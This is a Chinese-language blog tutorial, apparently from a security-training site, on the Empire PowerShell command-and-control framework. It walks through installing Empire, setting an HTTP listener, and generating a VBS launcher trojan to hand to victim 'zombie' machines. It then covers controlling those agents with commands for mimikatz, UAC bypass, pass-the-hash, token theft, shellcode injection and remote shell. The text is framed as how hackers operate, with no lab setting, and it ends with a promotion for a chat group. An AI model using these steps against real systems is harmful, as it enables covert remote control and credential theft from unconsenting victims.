12.17 我的天,內網滲透,大黑客是這樣進行操作的

1、Empire工具介紹

Empire是一個PowerShell後期漏洞利用代理工具同時也是一款很強大的後滲透測神器,它建立在密碼學、安全通信和靈活的架構之上。Empire實現了無需powershell.exe就可運行PowerShell代理的功能。快速部署後期漏洞利用模塊,從鍵盤記錄器到Mimikatz,並且能夠適應通信躲避網絡檢測,所有的這些功能都封裝在一個以實用性為重點的框架中


2、Empire工具安裝

雖然滲透的目標是windows,但Empire本身應該是運行在linux平臺的,首先把程序目錄下載下來:

git clone EmpireProject/Empire

接著就轉進”Empire/setup”目錄,安裝./install.sh。

sudo ./install.sh

3、Empire工具的攻擊利用

執行 sudo ./empire #執行工具操作

我的天,內網滲透,大黑客是這樣進行操作的

執行 listeners #進入監聽列表

我的天,內網滲透,大黑客是這樣進行操作的

如果出現[!] Invalid listener name 那麼先執行 uselistener http 選擇http模塊 再執行info 即可, 跳出就back


我的天,內網滲透,大黑客是這樣進行操作的

直接命令

set Name hacker

set Host http://192.168.1.14:443


設置完之後:

我的天,內網滲透,大黑客是這樣進行操作的

然後執行: run #運行監聽。 運行監聽之後生成木馬。 如果沒有run 命令就用 execute 取代run命令

我的天,內網滲透,大黑客是這樣進行操作的

執行:usestager 空格 然後Tab按鍵 會出現

bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy


Windows 就選擇 launcher_bat launcher_vbs 等。。 PHP 就選擇 hop_php

比如我選擇: launcher_vbs

執行:usestager launcher_vbs 監聽列表的名字 #這裡就是hacker, hacker就是我剛剛設置的監聽列表名字 (set Listener hacker)

然後執行:info 查看設置配置,木馬腳本放在了 /tmp/launcher.vbs

我的天,內網滲透,大黑客是這樣進行操作的

然後執行:execute #運行 生成木馬,生成成功 然後執行: sudo chmod 777 /tmp/launcher.vbs #賦予可讀可寫權限 然後丟給肉雞運行

我的天,內網滲透,大黑客是這樣進行操作的

生成成功

我的天,內網滲透,大黑客是這樣進行操作的

然後查看肉雞列表 執行命令: agents PS:如果你exit了 也就是退出了 你也可以直接執行agents命令查看肉雞列表

我的天,內網滲透,大黑客是這樣進行操作的

如果要控制肉雞的話:

就執行: interact 肉雞的名字

我的天,內網滲透,大黑客是這樣進行操作的

進入之後 執行幫助 help 查看 肉雞控制器的命令

agents 跳躍的代理人的菜單

back 返回菜單

bypassuac 運行bypassuac,開創一個新的高完整性為監聽代理。產卵

clear 清除代理任務。

creds 從數據庫顯示/返回憑證。

download 任務代理下載文件

exit 任務代理退出

help 顯示菜單或語法for the help特定的命令。

info 顯示有關此代理的信息

injectshellcode listener shellcode inject進入偏遠的過程。前listener米。injectshellcode<><>_ PID

jobs 返回工作或殺死一個正在運行的工作

kill 任務殺死特定進程名稱或ID.的代理

killdate 獲取或設置一個代理的killdate(01 / 01 / 2016)。

list 列出所有活動代理(或偵聽器)

listeners 跳轉到監聽器菜單

lostlimit 任務代理更改丟失代理檢測的限制

main 回到主菜單

mimikatz 運行在客戶端- mimikatz Invoke

psinject inject發射器向遠程進程。例如,psinject > < PID

pth 執行一個credid PTH通過Mimikatz。

rename 重命名代理

revtoself 使用憑證/令牌還原令牌權限。

sc 需要截圖,默認是PNG。給一個比率意味著使用JPEG。例SC [ 1 ]

scriptcmd 執行在目前進口PowerShell腳本函數。

scriptimport 進口的PowerShell腳本保存在存儲器中的代理。

searchmodule 模塊搜索帝國名稱/描述。

shell 使用shell命令的代理任務。

sleep 任務代理睡眠間隔[抖動]

spawn 對於給定的聽眾產生一個新的帝國代理名稱。產卵

steal_token 使用憑據/代幣冒充一個令牌的進程ID。

sysinfo 任務獲取系統信息的代理

updateprofile 更新代理連接配置文件

upload 任務代理上傳文件

usemodule 使用一個帝國的PowerShell模塊

workinghours 獲取或設置一個代理的工作時間


執行肉雞命令: shell 你想執行的系統命令

我的天,內網滲透,大黑客是這樣進行操作的

三、結束攻擊

如果你想刪除肉雞:

執行:agents #查看肉雞列表

我的天,內網滲透,大黑客是這樣進行操作的

執行:remove 肉雞名字

我的天,內網滲透,大黑客是這樣進行操作的

如果你想關閉監聽:

首先執行: listeners 查看監聽列表

我的天,內網滲透,大黑客是這樣進行操作的

然後執行: kill 監聽列表的名字 結束掉進程

我的天,內網滲透,大黑客是這樣進行操作的

最後喜歡我文章的朋友請加圈子關注我們,私信關鍵詞:加群。(送免費資料和優惠券)

就會自動分享給你群號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網絡安全技能一直是我們的初衷和願景,讓我們共同成為守護信息世界的"SaFeMAN"。

還有可以關注我們微信公眾號,在公眾號上輸入安界網,就可以關注到我們,領取資料和優惠券!


分享到:


相關文章: